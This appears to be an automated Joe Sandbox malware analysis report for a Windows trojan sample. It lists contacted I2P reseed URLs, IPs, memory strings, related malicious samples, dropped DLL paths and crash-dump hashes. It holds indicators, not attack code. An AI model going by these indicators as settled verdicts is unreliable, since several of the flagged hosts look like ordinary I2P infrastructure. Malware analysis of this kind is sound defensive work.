reseed.stormycloud.org	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Link
https://i2pseed.creativecowpat.net:8443/	1%	Virustotal	Browse
https://reseed-fr.i2pd.xyz/	3%	Virustotal	Browse
https://reseed.i2p-projekt.de/	4%	Virustotal	Browse
https://reseed.memcpy.io/	0%	Virustotal	Browse
https://netdb.i2p2.no/	0%	Virustotal	Browse
https://reseed.memcpy.io/p/p_lib.c	1%	Virustotal	Browse
https://i2p.ghativega.in/	0%	Virustotal	Browse
https://i2p.novg.net/	1%	Virustotal	Browse
https://www2.mk16.de/	0%	Virustotal	Browse
https://reseed.i2pgit.org/	2%	Virustotal	Browse
https://reseed-pl.i2pd.xyz/	0%	Virustotal	Browse
https://reseed.onion.im/	2%	Virustotal	Browse
http://127.0.0.1:8118	0%	Virustotal	Browse
https://reseed.diva.exchange/	2%	Virustotal	Browse
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/	0%	Virustotal	Browse
https://reseed.stormycloud.org/	0%	Virustotal	Browse
https://legit-website.com/i2pseeds.su3	0%	Virustotal	Browse
https://reseed2.i2p.net/	3%	Virustotal	Browse
https://banana.incognet.io/	2%	Virustotal	Browse
https://i2p.mooo.com/netDb/	2%	Virustotal	Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
reseed.memcpy.io	95.216.2.172	true	true	2%, Virustotal, Browse	unknown
reseed.stormycloud.org	144.172.118.154	true	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reseed-fr.i2pd.xyz/	main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	true	3%, Virustotal, Browse	unknown
https://reseed.diva.exchange/b.c	main.exe, 00000018.00000002.2875167256.0000021B16C37000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://i2pseed.creativecowpat.net:8443/	main.exe, main.exe, 00000022.00000002.3266524033.000002204CD00000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp	true	1%, Virustotal, Browse	unknown
https://reseed.i2p-projekt.de/	31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	false	4%, Virustotal, Browse	unknown
https://i2p.novg.net/	main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	true	1%, Virustotal, Browse	unknown
https://reseed.memcpy.io/p/p_lib.c	main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://netdb.i2p2.no/	31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	false	0%, Virustotal, Browse	unknown
https://reseed.memcpy.io/	main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://i2p.ghativega.in/	main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/	main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reseed.i2pgit.org/	main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	true	2%, Virustotal, Browse	unknown
https://www2.mk16.de/	31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2875167256.0000021B16BD8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000018.00000002.2876686721.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://reseed.onion.im/$	main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://reg.i2p/hosts.txt	main.exe, main.exe, 00000022.00000002.3266524033.000002204CD5C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, XFS8JZFg.24.dr	false		unknown
http://reg.i2p/hosts.txtj	main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3	main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reseed-pl.i2pd.xyz/	main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
http://stats.i2p/cgi-bin/newhosts.txt	31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	false		unknown
http://127.0.0.1:8118	31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000003.2979115871.000002204C927000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000003.2978974700.000002204C921000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	false	0%, Virustotal, Browse	unknown
http://identiguy.i2p/hosts.txt	31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	false		unknown
http://reg.i2p/hosts.txtp_lib.cwJ	main.exe, 00000018.00000002.2875358627.0000021B1704C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://banana.incognet.io/b.cM	main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reseed.diva.exchange/	main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	true	2%, Virustotal, Browse	unknown
https://reseed2.i2p.net/vp/p_lib.c	main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://legit-website.com/i2pseeds.su3	31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	false	0%, Virustotal, Browse	unknown
https://reseed.onion.im/	main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	true	2%, Virustotal, Browse	unknown
https://i2p.mooo.com/netDb/	31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	false	2%, Virustotal, Browse	unknown
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/	31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	false	0%, Virustotal, Browse	unknown
https://reseed.stormycloud.org/	main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://reseed2.i2p.net/	main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	true	3%, Virustotal, Browse	unknown
https://reseed.i2pgit.org/b.cQ	main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://	main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://banana.incognet.io/	main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	true	2%, Virustotal, Browse	unknown
http://rus.i2p/hosts.txt	31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, XFS8JZFg.24.dr	false		unknown
https://reseed-fr.i2pd.xyz/b.c	main.exe, 00000018.00000002.2875167256.0000021B16C37000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt	main.exe, main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmp, XFS8JZFg.24.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
84.229.124.109	unknown	Israel	9116	GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste	false
51.77.214.98	unknown	France	16276	OVHFR	false
129.159.76.100	unknown	United States	14506	ORCL-ASHBURN3US	false
38.143.66.87	unknown	United States	63023	AS-GLOBALTELEHOSTUS	false
217.233.45.79	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
195.16.22.143	unknown	Belgium	6848	TELENET-ASBE	false
146.70.24.213	unknown	United Kingdom	2018	TENET-1ZA	false
144.172.118.154	reseed.stormycloud.org	United States	46261	QUICKPACKETUS	true
46.17.106.104	unknown	Russian Federation	207569	IHOR-CORE-ASRU	false
95.216.2.172	reseed.memcpy.io	Germany	24940	HETZNER-ASDE	true
79.142.69.160	unknown	Netherlands	51430	ALTUSNL	false
40.134.93.123	unknown	United States	7029	WINDSTREAMUS	false
94.180.147.148	unknown	Russian Federation	41668	ERTH-KAZAN-ASRU	false
217.25.231.221	unknown	Russian Federation	6856	IC-VORONEZH-ASInformsvyaz-ChernozemyeRU	true
73.241.223.246	unknown	United States	7922	COMCAST-7922US	true
89.215.190.170	unknown	Bulgaria	13124	IBGCBG	false
174.3.142.31	unknown	Canada	6327	SHAWCA	false
151.242.162.160	unknown	Iran (ISLAMIC Republic Of)	31549	RASANAIR	false
81.110.100.190	unknown	United Kingdom	5089	NTLGB	false
64.99.192.91	unknown	Canada	15348	TUCOWSCA	false
185.82.126.58	unknown	Latvia	52173	MAKONIXLV	false
186.128.148.177	unknown	Argentina	22927	TelefonicadeArgentinaAR	false
5.74.117.69	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	false
173.44.49.91	unknown	United States	8100	ASN-QUADRANET-GLOBALUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532228
Start date and time:	2024-10-12 20:29:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@51/74@2/25
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 52.168.117.172
Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, onedsblobprdeus07.eastus.cloudapp.azure.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 31yd7ynpdj6jw5vl4xn9qyj7u.exe, PID 3416 because it is empty
Execution Graph export aborted for target file.exe, PID 2644 because there are no executed function
Execution Graph export aborted for target main.exe, PID 5164 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
14:30:02	API Interceptor	285x Sleep call for process: file.exe modified
14:30:03	API Interceptor	43x Sleep call for process: powershell.exe modified
14:30:53	API Interceptor	258x Sleep call for process: main.exe modified
14:31:13	API Interceptor	2x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
79.142.69.160	BL P.O_pdf.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	BL_P.O_pdf.exe	Get hash	malicious	Remcos	Browse
	Aaqaybpuu.exe	Get hash	malicious	Remcos	Browse
146.70.24.213	oUbgeGwOL8.exe	Get hash	malicious	LummaC, Amadey, Stealc	Browse	146.70.24.213/do/1654365431.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORCL-ASHBURN3US	na.elf	Get hash	malicious	Unknown	Browse	129.152.30.246
	na.elf	Get hash	malicious	Unknown	Browse	129.152.30.246
	na.elf	Get hash	malicious	Unknown	Browse	129.152.30.246
	na.elf	Get hash	malicious	Unknown	Browse	129.152.30.246
	na.elf	Get hash	malicious	Unknown	Browse	129.152.30.246
	na.elf	Get hash	malicious	Unknown	Browse	129.152.30.246
	na.elf	Get hash	malicious	Unknown	Browse	129.152.30.246
	na.elf	Get hash	malicious	Unknown	Browse	129.152.30.246
	na.elf	Get hash	malicious	Unknown	Browse	129.152.30.246
	na.elf	Get hash	malicious	Unknown	Browse	129.152.30.246
GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSyste	3wpWVfURxT.exe	Get hash	malicious	Unknown	Browse	84.94.45.89
	S2sQfgIthZ.elf	Get hash	malicious	Mirai	Browse	77.125.152.104
	na.elf	Get hash	malicious	Unknown	Browse	213.8.246.210
	na.elf	Get hash	malicious	Unknown	Browse	46.121.178.119
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	77.126.41.107
	na.elf	Get hash	malicious	Mirai, Okiru	Browse	84.95.12.200
	na.elf	Get hash	malicious	Mirai, Okiru	Browse	80.178.27.68
	arm7-20241006-0950.elf	Get hash	malicious	Unknown	Browse	77.124.162.245
	yakov.ppc.elf	Get hash	malicious	Mirai	Browse	87.71.35.118
	SecuriteInfo.com.Win32.Sector.30.19697.26848.exe	Get hash	malicious	Sality	Browse	80.178.242.19
OVHFR	na.elf	Get hash	malicious	Mirai	Browse	51.254.200.173
	http://myweatherradar.org./	Get hash	malicious	Unknown	Browse	51.89.9.253
	http://link.adultspace.com/link/67097a59d79290df75176b77/aHR0cHM6Ly93d3cuZnVja2Jvb2tkYXRpbmcubmV0L2VuL2F1dGg_dXNlcj00MzMwMDA4NzEmY29kZT0xZDE3OTYyMTE3YWUwMzNjN2QyOWFlOTdkZWFhZjY1MyZyZWRpcmVjdFBhZ2U9JTJGYWNjb3VudCZyZWRpcmVjdFBhZ2VQYXJhbXMlNUJ1c2VyJTVEPTQzMzAwMDg3MQ==?linkId=link_9	Get hash	malicious	Unknown	Browse	213.32.27.206
	http://link.adultspace.com/link/67097a59d79290df75176b77/aHR0cHM6Ly93d3cuZnVja2Jvb2tkYXRpbmcubmV0L2VuL2F1dGg_dXNlcj00MzMwMDA4NzEmY29kZT0xZDE3OTYyMTE3YWUwMzNjN2QyOWFlOTdkZWFhZjY1MyZyZWRpcmVjdFBhZ2U9JTJGYWNjb3VudCZyZWRpcmVjdFBhZ2VQYXJhbXMlNUJ1c2VyJTVEPTQzMzAwMDg3MQ==	Get hash	malicious	Unknown	Browse	213.32.27.206
	https://lessonfulladvocating.z19.web.core.windows.net/	Get hash	malicious	Anonymous Proxy	Browse	149.56.240.27
	Cotain Spires (RFP) ID#88763.pdf	Get hash	malicious	Unknown	Browse	144.217.123.236
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	51.89.9.252
	https://clicks.trx-hub.com/xid/pmc_0aaa4_wwd?q=https://aussiebongs.com/#aHdheXVuLmxlZSRoeXVuZGFpZWxldmF0b3IuY29t	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	139.99.144.190
	http://fastuniversaldelivery.com/	Get hash	malicious	Unknown	Browse	198.27.68.93
	https://purefitness.co.tz/coolimages/img/?action=validate&539=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=&r1=pending&r2=page&real=act	Get hash	malicious	Unknown	Browse	54.38.176.192

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_693df407-71e9-4305-94b4-25c12824397b\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9673522769489433
Encrypted:	false
SSDEEP:	96:BEF2S4CtDacwsehMX7q9fwQXIDcQic6EcERcw3W3d+HbHgoC5AJLnxZU6MDMr6kg:unF2cw/d0MALS36jcEazuiFhZ24lO8l
MD5:	FA480588CE4E6C85CD305D34A630E4F2
SHA1:	9354451DE3D64585A3491C790A25BAC52842AE24
SHA-256:	45E5ECBB19D94DF9845BD2CA6C564F9030792B4BEBBA593802624E353642C8C0
SHA-512:	235B91F73EC7EC731489BB409D4B8EAC02AD2BCB3C157598E073EFF7090E043650CBB7A78C455C9A83721875F05489DA90664C2FC6B33D532E5FD27178EFD190
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.2.3.1.5.0.8.0.6.8.9.9.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.2.3.1.5.0.8.4.9.0.8.6.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.3.d.f.4.0.7.-.7.1.e.9.-.4.3.0.5.-.9.4.b.4.-.2.5.c.1.2.8.2.4.3.9.7.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.0.a.0.7.7.7.-.a.e.4.a.-.4.f.3.f.-.b.9.c.a.-.4.4.c.a.0.f.5.a.b.9.4.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.a.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.2.c.-.0.0.0.0.-.0.0.1.5.-.e.6.2.b.-.6.0.f.1.d.4.1.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.1.8.d.4.3.1.0.6.5.7.e.8.3.6.8.5.5.7.f.1.8.3.e.1.5.c.4.7.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.a.c.f.e.6.3.9.7.d.f.f.c.6.1.d.2.4.3.2.0.6.8.8.5.c.3.8.9.e.a.0.5.4.2.8.7.5.5.!.m.a.i.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.:.0.0.!.1.d.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_8343aa60-c28b-40a9-9100-7a5ae7dee24a\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9804894053223562
Encrypted:	false
SSDEEP:	96:TIFSkDacrsehMX7q9fwQXIDcQic6EcERcw3W3d+HbHg/opAnQzOqg7ThVMkQBrso:EIk2cr/d0MALS36jN7EzuiF8Z24lO8l
MD5:	DA760A480514E0AA7B148B5718C59F7C
SHA1:	82CCA29751CAA9085F2181783568BCAD8FDAA4D2
SHA-256:	33B2617891B8BE7CE1CF7CBA129273A962414858FC48FCAFAA7527D5C78FA9D7
SHA-512:	4C2D6C2A8F299D05DC4F8DA16521001AC921AE90D30BFC5E36697781E39781C93D91FDEA3F214DC49591D7ED59EF26DA976F5B8BE07A903553925D95AC72C660
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.2.3.1.4.7.1.0.7.4.7.5.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.2.3.1.4.7.1.9.0.2.8.9.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.4.3.a.a.6.0.-.c.2.8.b.-.4.0.a.9.-.9.1.0.0.-.7.a.5.a.e.7.d.e.e.2.4.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.1.9.2.0.5.6.-.1.a.4.8.-.4.0.9.8.-.a.5.5.7.-.a.6.8.6.d.a.1.6.1.4.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.a.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.8.4.-.0.0.0.0.-.0.0.1.5.-.d.1.c.9.-.1.1.c.a.d.4.1.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.1.8.d.4.3.1.0.6.5.7.e.8.3.6.8.5.5.7.f.1.8.3.e.1.5.c.4.7.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.a.c.f.e.6.3.9.7.d.f.f.c.6.1.d.2.4.3.2.0.6.8.8.5.c.3.8.9.e.a.0.5.4.2.8.7.5.5.!.m.a.i.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.:.0.0.!.1.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7516.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Oct 12 18:31:48 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	607446
Entropy (8bit):	1.000392921919399
Encrypted:	false
SSDEEP:	768:SsqPkLHKb8uSDh8DyDn+JknfXZF9F0zTYMKqoHBaz8ZI2VNF:Ss3Kb8uIh8+DnJnfXZFLHBPZI2nF
MD5:	97A14606642463517549B0F8C2D215F1
SHA1:	43B0E2A6C4CA74B57D9D14A2865B6AE203102680
SHA-256:	D288D42CFDD83B69B9FDAE11387109B56BECF8B738F94E3237CB22A2AA9EEBEF
SHA-512:	84930715FE76B9C18DB5083F242B61FBFC229846878222D1C2E23DFF2BB9FD5E9A99BD804B4CD3858036217A7F7FD9944C2AD11D7C070E701DF1C961E7DD27F8
Malicious:	false
Preview:	MDMP..a..... ..........g........................P...............(...........X...........`.......8...........T............+..............$ ..........."..............................................................................eJ......."......Lw......................T.......,...\|..g.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER75C2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
